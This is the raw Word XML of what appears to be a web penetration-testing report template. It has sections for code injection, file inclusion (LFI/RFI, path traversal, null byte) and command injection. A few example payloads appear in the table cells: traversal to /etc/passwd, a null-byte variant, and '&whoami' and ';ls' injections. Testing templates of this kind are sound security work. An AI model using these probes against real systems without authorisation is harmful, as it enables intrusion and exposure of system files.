            <w:r w:rsidRPr="00632E6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4418469" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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0819239" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="4B6CD2D8" w14:textId="77777777" w:rsidTr="00F554AD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0FAE6FB6" w14:textId="2A279289" w:rsidR="006651A9" w:rsidRPr="001B44C5" w:rsidRDefault="00644D7F" w:rsidP="00F554A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44D7F"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 Input Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="320043D4" w14:textId="76339CE1" w:rsidR="006651A9" w:rsidRDefault="006651A9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644D7F" w:rsidRPr="00644D7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Form Fields, URL Parameters, HTTP Headers,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F36E405" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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7D68304" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="073E29C0" w14:textId="77777777" w:rsidTr="00F554AD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28E1909F" w14:textId="7E825484" w:rsidR="006651A9" w:rsidRPr="001B44C5" w:rsidRDefault="00644D7F" w:rsidP="00F554A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44D7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Injected Payloads &amp; Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76923104" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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16F55DF" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="7C3A8ABB" w14:textId="77777777" w:rsidTr="00F554AD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76D46724" w14:textId="7A0DBB3C" w:rsidR="006651A9" w:rsidRPr="007930E4" w:rsidRDefault="00644D7F" w:rsidP="00F554A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44D7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server Response Indicators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D85B95A" w14:textId="7279EB46" w:rsidR="006651A9" w:rsidRDefault="006651A9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644D7F" w:rsidRPr="00644D7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File Listings, User Info, Error Messages,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9B85919" w14:textId="77777777" w:rsidR="00E66A39" w:rsidRDefault="00E66A39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E24937B" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="2468BCAF" w14:textId="77777777" w:rsidTr="00F554AD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6CE918D9" w14:textId="2FAC9FF8" w:rsidR="006651A9" w:rsidRPr="002C242C" w:rsidRDefault="00E66A39" w:rsidP="00F554A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66A39">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>PHP Injection Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="576824CA" w14:textId="77777777" w:rsidR="00E66A39" w:rsidRDefault="00E66A39" w:rsidP="00E66A3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2C242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Yes/No, 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Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C5B3D4B" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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C8A659B" w14:textId="77777777" w:rsidR="00E66A39" w:rsidRDefault="00E66A39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E66A39" w:rsidRPr="00DB0B95" w14:paraId="315CF088" w14:textId="77777777" w:rsidTr="00F554AD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2EADB2BA" w14:textId="66595C17" w:rsidR="00E66A39" w:rsidRPr="00E66A39" w:rsidRDefault="00E66A39" w:rsidP="00F554A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66A39">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>ASP Code Injection Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E3503C" w14:textId="77777777" w:rsidR="00E66A39" w:rsidRDefault="00E66A39" w:rsidP="00E66A3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2C242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Yes/No, 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Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263D1C51" w14:textId="77777777" w:rsidR="00E66A39" w:rsidRDefault="00E66A39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8AE4A15" w14:textId="77777777" w:rsidR="00E66A39" w:rsidRDefault="00E66A39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651A9" w:rsidRPr="00DB0B95" w14:paraId="69D8296A" w14:textId="77777777" w:rsidTr="00F554AD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33D5B8A1" w14:textId="4846B6B3" w:rsidR="006651A9" w:rsidRDefault="00E66A39" w:rsidP="00F554A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66A39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Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C00F6B" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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41C398A" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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6651A9" w:rsidRPr="00DB0B95" w14:paraId="67762F8A" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr>
          <w:trHeight w:val="1250"/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24B9AFE3" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00BC63D1" w:rsidRDefault="006651A9" w:rsidP="00F554A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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="029D4BEB" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00FF267C" w:rsidRDefault="006651A9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[*If Any]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006651A9" w:rsidRPr="00DB0B95" w14:paraId="5422DC8B" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr>
          <w:trHeight w:val="1250"/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3C0AB1AE" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="00F554A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6E635F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="014F23F3" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="70DD8CAB" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr>
          <w:trHeight w:val="1250"/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873B456" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9" w:rsidP="00F554A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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69DA2580" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="5C98B708" w14:textId="77777777" w:rsidTr="00F554AD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7E6A6EE8" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="00F554A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Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542DC4F9" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="173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AEA66AF" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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D724CCD" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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4F90672" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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079498A" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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806EC02" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9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6651A9" w:rsidRPr="00DB0B95" w14:paraId="2E51438C" w14:textId="77777777" w:rsidTr="00F554AD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69B2917C" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="00F554A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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02842B40" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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37BEAA0" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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3E4D4B1" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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5C30A6A" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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6733F54" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9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6C96AD0D" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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5D2232" w:rsidRPr="00A51A96" w14:paraId="4372A842" w14:textId="77777777" w:rsidTr="00D74B35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2115267F" w14:textId="566DE20D" w:rsidR="005D2232" w:rsidRPr="003C713F" w:rsidRDefault="005D2232" w:rsidP="00972D9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8.6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5D2232">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for File Inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6ED50E8A" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00D74B35" w:rsidRDefault="005D2232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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="005D2232" w:rsidRPr="00DB0B95" w14:paraId="6C72E2E5" w14:textId="77777777" w:rsidTr="00D74B35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635CE7CE" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="00D74B3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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E35AE76" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95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D2232" w:rsidRPr="00DB0B95" w14:paraId="5A2262B9" w14:textId="77777777" w:rsidTr="00D74B35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0E77591D" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="00D74B3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Target </w:t>
            </w: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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13A272FF" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95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D2232" w:rsidRPr="00DB0B95" w14:paraId="1D979FB5" w14:textId="77777777" w:rsidTr="00D74B35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743234FC" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="00D74B3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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4527A953" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95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D2232" w:rsidRPr="00DB0B95" w14:paraId="64722D50" w14:textId="77777777" w:rsidTr="00D74B35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CD6B254" w14:textId="59098E1B" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="00D74B3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D2232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File Inclusion Points Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3384169C" w14:textId="4AA06F96" w:rsidR="005D2232" w:rsidRPr="00632E60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32E6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5D223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List of Affected Parameters</w:t>
            </w:r>
            <w:r w:rsidRPr="00632E6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D642D32" w14:textId="77777777" w:rsidR="005D2232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726BECA" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95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D2232" w:rsidRPr="00DB0B95" w14:paraId="7F4080AB" w14:textId="77777777" w:rsidTr="00D74B35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0B413F6A" w14:textId="44E6C64C" w:rsidR="005D2232" w:rsidRPr="001B44C5" w:rsidRDefault="005D2232" w:rsidP="00D74B3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D2232">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Local File Inclusion (LFI) Exploitable?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="612A87D1" w14:textId="5379FED7" w:rsidR="005D2232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5D223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 Payloads Used: ?file=../../etc/passwd,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7A9539D" w14:textId="77777777" w:rsidR="005D2232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5F97D15" w14:textId="77777777" w:rsidR="005D2232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D2232" w:rsidRPr="00DB0B95" w14:paraId="4AC0A726" w14:textId="77777777" w:rsidTr="00D74B35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68950BA4" w14:textId="7138973B" w:rsidR="005D2232" w:rsidRPr="001B44C5" w:rsidRDefault="005D2232" w:rsidP="00D74B3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D2232">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Path Traversal Vulnerability Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E4DD96" w14:textId="77777777" w:rsidR="005D2232" w:rsidRDefault="005D2232" w:rsidP="005D223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2C242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Yes/No, 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Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EC8598" w14:textId="77777777" w:rsidR="005D2232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4CDEB16" w14:textId="77777777" w:rsidR="005D2232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D2232" w:rsidRPr="00DB0B95" w14:paraId="57DD0D58" w14:textId="77777777" w:rsidTr="00D74B35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BD935D1" w14:textId="304CA575" w:rsidR="005D2232" w:rsidRPr="007930E4" w:rsidRDefault="005D2232" w:rsidP="00D74B3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D2232">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Null Byte Injection Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F28B09" w14:textId="69ADCB50" w:rsidR="005D2232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5D223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 Payloads Used: /etc/passwd%00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1CCB8A1" w14:textId="77777777" w:rsidR="005D2232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1FE9C9F" w14:textId="77777777" w:rsidR="005D2232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5D3C297" w14:textId="77777777" w:rsidR="00D74B35" w:rsidRDefault="00D74B35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D2232" w:rsidRPr="00DB0B95" w14:paraId="07053204" w14:textId="77777777" w:rsidTr="00D74B35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655D7C9" w14:textId="3C65745B" w:rsidR="005D2232" w:rsidRPr="002C242C" w:rsidRDefault="004E7455" w:rsidP="00D74B3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E7455">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Remote File Inclusion (RFI) Vulnerable?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36442CA9" w14:textId="56DD7700" w:rsidR="005D2232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DC707A" w:rsidRPr="00DC707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Injected External URL &amp; Response Behavior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07225C9" w14:textId="77777777" w:rsidR="005D2232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6207A6A" w14:textId="77777777" w:rsidR="005D2232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D2232" w:rsidRPr="00DB0B95" w14:paraId="797C6AC1" w14:textId="77777777" w:rsidTr="00D74B35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6D5C8071" w14:textId="332C4AF4" w:rsidR="005D2232" w:rsidRPr="00E66A39" w:rsidRDefault="001C782B" w:rsidP="00D74B3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C782B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Source Code Analysis for RFI Found Issues?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B869B6" w14:textId="25D09790" w:rsidR="005D2232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1C782B" w:rsidRPr="001C782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Unvalidated File Inclusion in Scripts?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DBC2BEF" w14:textId="77777777" w:rsidR="005D2232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6EE27E0" w14:textId="77777777" w:rsidR="005D2232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D2232" w:rsidRPr="00DB0B95" w14:paraId="51FFF45E" w14:textId="77777777" w:rsidTr="00D74B35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351858AA" w14:textId="595A3E82" w:rsidR="005D2232" w:rsidRDefault="00A23D96" w:rsidP="00D74B3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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="020E30A0" w14:textId="77777777" w:rsidR="005D2232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2203555" w14:textId="77777777" w:rsidR="00D74B35" w:rsidRDefault="00D74B35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F3087DA" w14:textId="77777777" w:rsidR="00D74B35" w:rsidRDefault="00D74B35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56C2CCF" w14:textId="77777777" w:rsidR="005D2232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D2232" w:rsidRPr="00DB0B95" w14:paraId="6DBD33C3" w14:textId="77777777" w:rsidTr="00D74B35">
        <w:trPr>
          <w:trHeight w:val="1250"/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634E8B98" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00BC63D1" w:rsidRDefault="005D2232" w:rsidP="00D74B3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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B6F2BBE" w14:textId="77777777" w:rsidR="005D2232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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338036AE" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRDefault="004B56EC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F6254FC" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRDefault="004B56EC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74E3111" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRPr="00FF267C" w:rsidRDefault="004B56EC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D2232" w:rsidRPr="00DB0B95" w14:paraId="28017CB5" w14:textId="77777777" w:rsidTr="00D74B35">
        <w:trPr>
          <w:trHeight w:val="1250"/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0E77B0D6" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="00D74B3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6E635F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65B47F47" w14:textId="77777777" w:rsidR="005D2232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D62B0C3" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRDefault="004B56EC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9A6BAEF" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRDefault="004B56EC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0C7B1EC" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRPr="00DB0B95" w:rsidRDefault="004B56EC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D2232" w:rsidRPr="00DB0B95" w14:paraId="1CA3C52F" w14:textId="77777777" w:rsidTr="00D74B35">
        <w:trPr>
          <w:trHeight w:val="1250"/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C19FAA7" w14:textId="77777777" w:rsidR="005D2232" w:rsidRDefault="005D2232" w:rsidP="00D74B3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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4142515E" w14:textId="77777777" w:rsidR="005D2232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6009FD3" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRDefault="004B56EC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E5680B4" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRDefault="004B56EC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6C185B0" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRDefault="004B56EC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BB1BCC5" w14:textId="77777777" w:rsidR="004B56EC" w:rsidRPr="00DB0B95" w:rsidRDefault="004B56EC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D2232" w:rsidRPr="00DB0B95" w14:paraId="40A5C835" w14:textId="77777777" w:rsidTr="00D74B35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1D05A0A" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="00D74B3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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="411B13CA" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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6D30446" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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857CDBE" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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B7CC378" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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C63BD72" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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96772A3" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95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D2232" w:rsidRPr="00DB0B95" w14:paraId="2816BECC" w14:textId="77777777" w:rsidTr="00D74B35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32FE6FCC" w14:textId="77777777" w:rsidR="005D2232" w:rsidRPr="00DB0B95" w:rsidRDefault="005D2232" w:rsidP="00D74B3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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6613B714" w14:textId="77777777" w:rsidR="005D2232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D636F88" w14:textId="77777777" w:rsidR="005D2232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ABA7227" w14:textId="77777777" w:rsidR="005D2232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DB9E90F" w14:textId="77777777" w:rsidR="005D2232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24E54B4" w14:textId="77777777" w:rsidR="005D2232" w:rsidRDefault="005D2232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FCB1678" w14:textId="77777777" w:rsidR="00A23D96" w:rsidRDefault="00A23D9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02EA257" w14:textId="77777777" w:rsidR="00A23D96" w:rsidRPr="00DB0B95" w:rsidRDefault="00A23D9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40128422" w14:textId="77777777" w:rsidR="005D2232" w:rsidRDefault="005D2232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A23D96" w:rsidRPr="00A51A96" w14:paraId="2D36E573" w14:textId="77777777" w:rsidTr="00870102">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6B581552" w14:textId="23E59BAA" w:rsidR="00A23D96" w:rsidRPr="003C713F" w:rsidRDefault="00A23D96" w:rsidP="00972D9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8.7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A23D96">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A05A1F7" w14:textId="77777777" w:rsidR="00A23D96" w:rsidRPr="00870102" w:rsidRDefault="00A23D96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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="008677C4" w:rsidRPr="00DB0B95" w14:paraId="47FAF278" w14:textId="77777777" w:rsidTr="00870102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34CC5AB1" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="0087010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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC007E1" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4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677C4" w:rsidRPr="00DB0B95" w14:paraId="2CDC588A" w14:textId="77777777" w:rsidTr="00870102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0134B41F" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="0087010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Target </w:t>
            </w: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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DEECA86" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4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677C4" w:rsidRPr="00DB0B95" w14:paraId="37FC852B" w14:textId="77777777" w:rsidTr="00870102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1C3D6D9E" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="0087010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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA304CF" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4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677C4" w:rsidRPr="00DB0B95" w14:paraId="0985D975" w14:textId="77777777" w:rsidTr="00870102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6D8D81C8" w14:textId="3AA205CA" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="0087010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677C4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Modified URL Parameters Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68B8DA94" w14:textId="59054EDD" w:rsidR="008677C4" w:rsidRPr="00632E60" w:rsidRDefault="008677C4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32E6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8677C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 Payloads Used: &amp;whoami, ;ls, etc.</w:t>
            </w:r>
